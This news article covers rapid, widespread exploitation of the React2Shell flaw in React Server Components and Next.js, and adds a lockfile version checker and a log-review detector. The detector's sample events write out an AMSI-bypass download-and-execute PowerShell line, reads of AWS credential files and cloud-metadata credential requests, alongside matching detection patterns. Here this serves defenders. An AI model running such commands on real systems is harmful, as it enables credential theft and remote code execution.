When news of the maximum-severity vulnerability in the open-source React framework broke last week, cybersecurity vendors warned that the software's broad use and the ease with which the flaw could be triggered likely meant it would be exploited rapidly and widely. They weren't wrong.
Multiple China-nexus threat groups like Earth Lamia and Jackpot Panda were actively trying to exploit the vulnerability within hours of its disclosure, according to Amazon Web Services (AWS), and Justin Moore, senior manager of threat intel research at Palo Alto Networks’ Unit 42 group, confirmed a day later that more than 30 organizations across a range of sectors were affected by the bug.
The Unit 42 researchers saw scanning for servers vulnerable to remote code execution (RCE), attempted theft of AWS configuration and credential files, and the installation of downloaders, and linked the activity to CL-STA-1015 (also known as UNC5174), a group suspected of acting as an initial access broker with ties to the Chinese Ministry of State Security, Moore said.
Efforts by cybercriminals to exploit the flaw, now called React2Shell and tracked as CVE-2025-55182 with a CVSS severity score of 10, accelerated over the weekend, according to security researchers. In a report this week, Unit 42 analysts wrote that they had detected exploitation activity beyond what Moore described last week, including attempts to install Cobalt Strike, malicious dropper scripts, cryptocurrency mining software and interactive webshells, the installation and execution of the NoodleRat backdoor, and the execution of SnowLight malware and the VShell remote access trojan.
“The immediate and expansive exploitation of this vulnerability highlights the speed at which threat actors move to seize on opportunities,” the researchers wrote. “While we have noted China-nexus activity, the footprint of activity will encompass significant amounts of cybercriminal motivations as well.”
Both the React team and Vercel, the developer of Next.js, have issued fixes for RSC (versions 19.0.1, 19.1.2, and 19.2.1) and for Next.js, but the key to the threat is that the vulnerability can be exploited without authentication, and bad actors are getting faster at exploiting newly disclosed flaws.
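As an added check (example code written for this article, not code from the React team, Vercel or the page's author): a Node.js script that walks a package-lock.json dependency tree and flags React Server Components packages whose installed version is older than the fixed releases named above. The package names react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack are an assumption about where the RSC runtime lives in a project; confirm them, and the exact affected ranges, against the vendor advisory. The lockfile excerpt below is constructed for the example.

```javascript
// Added example, not code from the React team, Vercel or this article.
// Flags React Server Components packages in a package-lock.json (v2/v3
// "packages" map) whose version predates the fixed releases the article
// names: 19.0.1, 19.1.2 and 19.2.1. Package names are an assumption; check
// them against the vendor advisory for your stack.
const RSC_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);

// Fixed version for each affected 19.x minor line (from the article).
const FIXED_BY_MINOR = { "19.0": "19.0.1", "19.1": "19.1.2", "19.2": "19.2.1" };

// Parses "major.minor.patch"; pre-release tags such as -canary are ignored,
// which errs on the side of flagging them.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? [Number(m[1]), Number(m[2]), Number(m[3])] : null;
}

function cmpSemver(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

// True when the version sits in a fixed 19.x line but is older than the fix.
// Versions outside those lines are not judged by this check.
function isVulnerableRscVersion(version) {
  const parsed = parseSemver(version);
  if (!parsed) return false;
  const fixed = FIXED_BY_MINOR[`${parsed[0]}.${parsed[1]}`];
  return fixed ? cmpSemver(parsed, parseSemver(fixed)) < 0 : false;
}

// Walks every installed copy, including nested node_modules, and returns
// the vulnerable ones together with the version to upgrade to.
function findVulnerableRsc(lockfile) {
  const hits = [];
  for (const [path, meta] of Object.entries(lockfile.packages || {})) {
    const name = path.split("node_modules/").pop();
    if (!RSC_PACKAGES.has(name) || !meta || !isVulnerableRscVersion(meta.version)) continue;
    const [major, minor] = parseSemver(meta.version);
    hits.push({ path, name, version: meta.version, fixed: FIXED_BY_MINOR[`${major}.${minor}`] });
  }
  return hits;
}

// Constructed lockfile excerpt for the example (not a real project).
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/react": { version: "19.2.0" },
    "node_modules/react-server-dom-webpack": { version: "19.2.0" },
    "node_modules/some-ui-kit/node_modules/react-server-dom-turbopack": { version: "19.1.2" },
  },
};

console.log(JSON.stringify(findVulnerableRsc(SAMPLE_LOCKFILE), null, 2));
```

To run it against a real project, replace SAMPLE_LOCKFILE with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`. The script only judges the RSC runtime packages; the Next.js patches are a separate upgrade and need their own check, and a clean lockfile says nothing about what is actually deployed in a container image.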
Michael Bell, founder and CEO of Suzu Labs, said that “hours from disclosure to active exploitation by nation-state actors is the new normal, and it’s only going to accelerate. China-nexus groups like Earth Lamia and Jackpot Panda have industrialized their vulnerability response: they monitor disclosures, grab public PoCs – even broken ones – and spray them at scale before most organizations have finished reading the advisory.”
Bell added that AWS’s report, which showed attackers debugging their exploits in real time against honeypots, is evidence that the bad actors aren’t just running automated scanning: “it’s hands-on-keyboard operators racing to establish persistence before patches roll out.” That window between disclosure and weaponization will close further as attackers expand their use of AI to parse disclosures and generate exploit code.
The FBI also weighed in, with Brett Leatherman, assistant director of the agency’s Cyber Division, urging security teams to apply the patches and review logs and endpoint telemetry for signs of threats.
“This is a pre-auth, single-request RCE,” Leatherman wrote on LinkedIn. “Successful exploitation allows an external actor to execute code on the application server, access secrets, and move further into cloud or enterprise environments. Current internet telemetry shows high-volume, automated exploitation attempts, often followed by encoded PowerShell, AMSI-bypass techniques, and other familiar post-exploitation behavior – giving defenders concrete signals to monitor.”
React2Shell is a vulnerability in React Server Components (RSC), the React architecture that lets developers render components exclusively on the server. The flaw spilled into frameworks and libraries built on RSC implementations, particularly Next.js. Both are broadly used: Wiz notes that 39% of cloud environments contain instances of Next.js or React in versions vulnerable to React2Shell, and 44% have publicly exposed Next.js instances.
Like Unit 42, Wiz researchers wrote this week that they have seen rapid exploitation efforts, with most attacks targeting internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services.
The activity ranges from cloud-native initial access, reconnaissance, credential harvesting and cloud metadata access, to containerized crypto-mining deployments, to backdoors and post-exploitation frameworks.
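Leatherman’s advice to review logs and endpoint telemetry, the AWS credential-file theft Unit 42 observed, and the credential harvesting and cloud metadata access Wiz describes all reduce to a handful of string checks on process command lines. The following is an added example (not code from the FBI, Unit 42, Wiz or this article’s author): it assumes a simple one-event-per-line format (timestamp, host, cmd="...") and decodes PowerShell -EncodedCommand payloads, which are base64 of UTF-16LE text, before matching. The events and the AMSI-bypass one-liner in them are constructed for the example; the indicator list is a starting point, not a complete signature set.

```javascript
// Added example for reviewing process telemetry after React2Shell exploitation.
// Not code from the article, the FBI or any vendor named in it. The log format
// is an assumption: one process event per line as `<timestamp> <host> cmd="<cmdline>"`.
// Indicators follow the post-exploitation behaviour the article describes:
// encoded PowerShell with AMSI tampering, reads of AWS credential files, and
// requests to the cloud instance-metadata endpoint.

// PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is
// base64 of UTF-16LE text, so decode it before matching.
function decodeEncodedCommand(cmdline) {
  const m = /-(?:e|ec|en|enc|encod|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i.exec(cmdline);
  if (!m) return null;
  return Buffer.from(m[1], "base64").toString("utf16le");
}

const INDICATORS = [
  { name: "amsi-tamper", re: /amsiInitFailed|AmsiUtils|AmsiScanBuffer|amsi\.dll/i },
  { name: "download-exec", re: /\bIEX\b|Invoke-Expression|DownloadString|DownloadFile/i },
  { name: "aws-credential-file", re: /\.aws[\\/](credentials|config)\b/i },
  { name: "cloud-metadata", re: /169\.254\.169\.254|metadata\.google\.internal/i },
];

function parseLine(line) {
  const m = /^(\S+)\s+(\S+)\s+cmd="(.*)"$/.exec(line);
  return m ? { ts: m[1], host: m[2], cmd: m[3] } : null;
}

// Returns the event with its decoded payload (if any) and the indicator names
// that matched either the raw command line or the decoded text.
function analyzeLine(line) {
  const ev = parseLine(line);
  if (!ev) return null;
  const decoded = decodeEncodedCommand(ev.cmd);
  const haystack = decoded ? ev.cmd + "\n" + decoded : ev.cmd;
  const hits = INDICATORS.filter((i) => i.re.test(haystack)).map((i) => i.name);
  // Encoded PowerShell is itself worth a look, so it is always recorded.
  if (decoded) hits.unshift("encoded-powershell");
  return { ...ev, decoded, hits };
}

function findSuspicious(lines) {
  return lines.map(analyzeLine).filter((r) => r && r.hits.length > 0);
}

// Constructed sample events (not real telemetry). The encoded payloads are
// built here so the base64 is correct; 203.0.113.10 is a documentation address.
const enc = (s) => Buffer.from(s, "utf16le").toString("base64");
const SAMPLE_LOG = [
  `2025-12-06T10:21:03Z web-01 cmd="powershell.exe -NoProfile -enc ${enc("Get-Date")}"`,
  `2025-12-06T10:21:09Z web-01 cmd="powershell.exe -nop -w hidden -e ${enc(
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')" +
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); " +
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"
  )}"`,
  `2025-12-06T10:22:41Z app-7 cmd="cat /home/node/.aws/credentials"`,
  `2025-12-06T10:22:44Z app-7 cmd="curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/"`,
  `2025-12-06T10:30:00Z app-7 cmd="node server.js"`,
];

for (const r of findSuspicious(SAMPLE_LOG)) {
  console.log(`${r.ts} ${r.host} [${r.hits.join(",")}] ${r.decoded ?? r.cmd}`);
}
```

The benign encoded `Get-Date` is reported with only the encoded-powershell tag, which is why the decoded text is returned alongside the hits: an analyst can dismiss it in a second, while the second event stacks encoded-powershell, amsi-tamper and download-exec and deserves a host-level investigation. On the application side, the container reading `.aws/credentials` and then calling the metadata endpoint is the sequence Unit 42 and Wiz describe, and is a strong signal to rotate the affected credentials even before the rest of the triage is done.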
They also noted that Next.js was likely the initial focus for bad actors because it is the most popular framework using RSC, and RSC is enabled and exposed by default on all Next.js applications. Other RSC-based platforms are likely to be in the threat groups’ crosshairs as well.
“In our internal research, we successfully executed code using this PoC [proof-of-concept] (with minor adjustments) on both Waku and Vite (with the RSC Plugin),” they wrote. “With only minor modifications to the PoC, we are confident that more frameworks are vulnerable and would require only very minor adjustments to be exploited as well.”
Caitlin Condon, vice president of security research at VulnCheck, wrote last week that multiple PoC RCE exploits were publicly available and that the vendor’s Canary Intelligence network was detecting hundreds of exploitation attempts.
“Broad, opportunistic scanning and exploitation are ongoing, and Vercel is offering large bounties for anyone who reports successful WAF [web application firewall] bypasses,” Condon wrote.
Over the weekend, Vercel said it is partnering with HackerOne to reward those who report successfully bypassing Vercel’s protections with bounties of $25,000 to $50,000.
Cloudflare said December 5 that a portion of its network experienced failures affecting about 28% of the HTTP traffic it serves, in connection with React2Shell. However, the failures, which lasted about 25 minutes, were not the result of exploitation of the vulnerability; they stemmed from Cloudflare’s own mitigation work.
“The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind,” Cloudflare CTO Dane Knecht wrote. “Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.”